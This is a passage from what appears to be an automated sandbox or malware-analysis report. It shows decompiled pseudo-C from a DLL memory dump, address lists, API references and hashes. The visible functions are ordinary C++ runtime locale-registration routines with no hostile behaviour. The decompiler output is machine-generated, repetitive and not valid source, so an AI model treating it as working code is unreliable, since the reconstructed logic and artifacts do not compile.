																_t270 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6D4866BA(_t286 - 0x14);
																	return E6D4A0075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6D4915C4(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t286 - 0x20);
																			E6D4A3D74(_t286 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t203, _t270, _t277, 0x14);
																			E6D486653(_t286 - 0x14, 0);
																			_t278 =  *0x6d546dd0; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6D46161C(0x6d546d60);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6D4866BA(_t286 - 0x14);
																				return E6D4A0075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6D49162A(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6D461438(_t245);
																						E6D4A3D74(_t286 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6d4ec0c4;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6D49542F(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6D4A0075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6D486FD3(__eflags, _t271);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6d546dd0 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6D486FD3(__eflags, _t270);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6d546e00 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6D486FD3(__eflags, _t269);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6d546dcc = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6D486FD3(__eflags, _t268);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6d546dfc = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6D486FD3(__eflags, _t267);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6d546de0 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6D486FD3(__eflags, _t266);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6d546ddc = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x6d48f94b
0x6d48f94b
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f97c
0x6d48f981
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989

APIs

__EH_prolog3.LIBCMT ref: 6D48F952
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F95C
int.LIBCPMT ref: 6D48F973

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F9AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F9CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F9EB

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 1de1452794336d9ecd64706f9208bfe92dcb09241b9dab73658e449ec1d9fd58
Instruction ID: 413d63261156e07c60e9a0c56b7c34ef882b037ff71d2c1a7543f1ac3963d020
Opcode Fuzzy Hash: 1de1452794336d9ecd64706f9208bfe92dcb09241b9dab73658e449ec1d9fd58
Instruction Fuzzy Hash: A011E0B5808169ABCF01EBA0C850EEDB775AF94314F2A400DD611BB392DB70DD018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49B93E, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D49B93E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t242 - 0x14, 0);
				_t231 =  *0x6d546e34; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6D46161C(0x6d546e14);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6D4866BA(_t242 - 0x14);
					return E6D4A0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6D49C0B8(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t242 - 0x20);
							E6D4A3D74(_t242 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t225, _t231, 0x14);
							E6D486653(_t242 - 0x14, 0);
							_t232 =  *0x6d546e3c; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6D46161C(0x6d546e1c);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6D4866BA(_t242 - 0x14);
								return E6D4A0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6D49C120(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t242 - 0x20);
										E6D4A3D74(_t242 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t172, _t226, _t232, 0x14);
										E6D486653(_t242 - 0x14, 0);
										_t233 =  *0x6d546e38; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6D46161C(0x6d546e18);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6D4866BA(_t242 - 0x14);
											return E6D4A0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6D49C1A4(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t242 - 0x20);
													E6D4A3D74(_t242 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t172, _t227, _t233, 0x14);
													E6D486653(_t242 - 0x14, 0);
													_t234 =  *0x6d546e40; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6D46161C(0x6d546e20);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6D4866BA(_t242 - 0x14);
														return E6D4A0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6D49C229(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t242 - 0x20);
																E6D4A3D74(_t242 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t172, _t228, _t234, 0x14);
																E6D486653(_t242 - 0x14, 0);
																_t235 =  *0x6d546e44; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6D46161C(0x6d546e24);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6D4866BA(_t242 - 0x14);
																	return E6D4A0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6D49C295(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6D461438(_t207);
																			E6D4A3D74(_t242 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6d4ec414;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6D49D028(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6D4A0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6D486FD3(__eflags, _t229);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6d546e44 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6D486FD3(__eflags, _t228);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6d546e40 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6D486FD3(__eflags, _t227);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6d546e38 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6D486FD3(__eflags, _t226);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6d546e3c = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6D486FD3(__eflags, _t225);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6d546e34 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

0x6d49b93e
0x6d49b93e
0x6d49b945
0x6d49b94f
0x6d49b954
0x6d49b95f
0x6d49b963
0x6d49b966
0x6d49b96b
0x6d49b96f
0x6d49b974
0x6d49b978
0x6d49b9bd
0x6d49b9c0
0x6d49b9cc
0x6d49b97a
0x6d49b97c
0x6d49b982
0x6d49b988
0x6d49b990
0x6d49b993
0x6d49b9d0
0x6d49b9de
0x6d49b9e3
0x6d49b9eb
0x6d49b9f5
0x6d49b9fa
0x6d49ba05
0x6d49ba09
0x6d49ba0c
0x6d49ba11
0x6d49ba1a
0x6d49ba1c
0x6d49ba1e
0x6d49ba63
0x6d49ba66
0x6d49ba72
0x6d49ba20
0x6d49ba20
0x6d49ba22
0x6d49ba28
0x6d49ba2e
0x6d49ba36
0x6d49ba39
0x6d49ba76
0x6d49ba84
0x6d49ba89
0x6d49ba91
0x6d49ba9b
0x6d49baa0
0x6d49baab
0x6d49baaf
0x6d49bab2
0x6d49bab7
0x6d49bac0
0x6d49bac2
0x6d49bac4
0x6d49bb09
0x6d49bb0c
0x6d49bb18
0x6d49bac6
0x6d49bac6
0x6d49bac8
0x6d49bace
0x6d49bad4
0x6d49badc
0x6d49badf
0x6d49bb1c
0x6d49bb2a
0x6d49bb2f
0x6d49bb37
0x6d49bb41
0x6d49bb46
0x6d49bb51
0x6d49bb55
0x6d49bb58
0x6d49bb5d
0x6d49bb66
0x6d49bb68
0x6d49bb6a
0x6d49bbaf
0x6d49bbb2
0x6d49bbbe
0x6d49bb6c
0x6d49bb6c
0x6d49bb6e
0x6d49bb74
0x6d49bb7a
0x6d49bb82
0x6d49bb85
0x6d49bbc2
0x6d49bbd0
0x6d49bbd5
0x6d49bbdd
0x6d49bbe7
0x6d49bbec
0x6d49bbf7
0x6d49bbfb
0x6d49bbfe
0x6d49bc03
0x6d49bc0c
0x6d49bc0e
0x6d49bc10
0x6d49bc55
0x6d49bc58
0x6d49bc64
0x6d49bc12
0x6d49bc12
0x6d49bc14
0x6d49bc1a
0x6d49bc20
0x6d49bc28
0x6d49bc2b
0x6d49bc65
0x6d49bc68
0x6d49bc76
0x6d49bc7b
0x6d49bc83
0x6d49bc88
0x6d49bc8a
0x6d49bc90
0x6d49bc93
0x6d49bc9c
0x6d49bc9c
0x6d49bc9c
0x6d49bca0
0x6d49bca6
0x6d49bca9
0x6d49bcb5
0x6d49bc2d
0x6d49bc2d
0x6d49bc30
0x6d49bc34
0x6d49bc38
0x6d49bc45
0x6d49bc4d
0x6d49bc4f
0x00000000
0x6d49bc4f
0x6d49bc16
0x6d49bc16
0x00000000
0x6d49bc16
0x6d49bc14
0x6d49bb87
0x6d49bb87
0x6d49bb8a
0x6d49bb8e
0x6d49bb92
0x6d49bb9f
0x6d49bba7
0x6d49bba9
0x00000000
0x6d49bba9
0x6d49bb70
0x6d49bb70
0x00000000
0x6d49bb70
0x6d49bb6e
0x6d49bae1
0x6d49bae1
0x6d49bae4
0x6d49bae8
0x6d49baec
0x6d49baf9
0x6d49bb01
0x6d49bb03
0x00000000
0x6d49bb03
0x6d49baca
0x6d49baca
0x00000000
0x6d49baca
0x6d49bac8
0x6d49ba3b
0x6d49ba3b
0x6d49ba3e
0x6d49ba42
0x6d49ba46
0x6d49ba53
0x6d49ba5b
0x6d49ba5d
0x00000000
0x6d49ba5d
0x6d49ba24
0x6d49ba24
0x00000000
0x6d49ba24
0x6d49ba22
0x6d49b995
0x6d49b995
0x6d49b998
0x6d49b99c
0x6d49b9a0
0x6d49b9ad
0x6d49b9b5
0x6d49b9b7
0x00000000
0x6d49b9b7
0x6d49b97e
0x6d49b97e
0x00000000
0x6d49b97e
0x6d49b97c

APIs

__EH_prolog3.LIBCMT ref: 6D49B945
std::_Lockit::_Lockit.LIBCPMT ref: 6D49B94F
int.LIBCPMT ref: 6D49B966

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D49B9A0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49B9C0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49B9DE

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 2dadaa7b8b92e5aaa80ac16c4c4280a3d7722f3b0bccfc34945aa5ccbaab6729
Instruction ID: 3e65a5739e91fbbf53de77b968be8bc3a21afed7d5e1aef55939d2bab6454509
Opcode Fuzzy Hash: 2dadaa7b8b92e5aaa80ac16c4c4280a3d7722f3b0bccfc34945aa5ccbaab6729
Instruction Fuzzy Hash: 5D11A375818229DBCF05EBA4C850EEEBBB5AF54314F1A400DD611AB391DB749D01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49B898, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D49B898(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t286 - 0x14, 0);
				_t273 =  *0x6d546e30; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6D46161C(0x6d546e10);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6D4866BA(_t286 - 0x14);
					return E6D4A0075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6D49C050(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t286 - 0x20);
							E6D4A3D74(_t286 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t266, _t273, 0x14);
							E6D486653(_t286 - 0x14, 0);
							_t274 =  *0x6d546e34; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6D46161C(0x6d546e14);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6D4866BA(_t286 - 0x14);
								return E6D4A0075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6D49C0B8(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t286 - 0x20);
										E6D4A3D74(_t286 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t203, _t267, _t274, 0x14);
										E6D486653(_t286 - 0x14, 0);
										_t275 =  *0x6d546e3c; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6D46161C(0x6d546e1c);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6D4866BA(_t286 - 0x14);
											return E6D4A0075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6D49C120(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t286 - 0x20);
													E6D4A3D74(_t286 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t203, _t268, _t275, 0x14);
													E6D486653(_t286 - 0x14, 0);
													_t276 =  *0x6d546e38; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6D46161C(0x6d546e18);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6D4866BA(_t286 - 0x14);
														return E6D4A0075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6D49C1A4(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t286 - 0x20);
																E6D4A3D74(_t286 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t203, _t269, _t276, 0x14);
																E6D486653(_t286 - 0x14, 0);
																_t277 =  *0x6d546e40; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6D46161C(0x6d546e20);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6D4866BA(_t286 - 0x14);
																	return E6D4A0075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6D49C229(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t286 - 0x20);
																			E6D4A3D74(_t286 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t203, _t270, _t277, 0x14);
																			E6D486653(_t286 - 0x14, 0);
																			_t278 =  *0x6d546e44; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6D46161C(0x6d546e24);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6D4866BA(_t286 - 0x14);
																				return E6D4A0075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
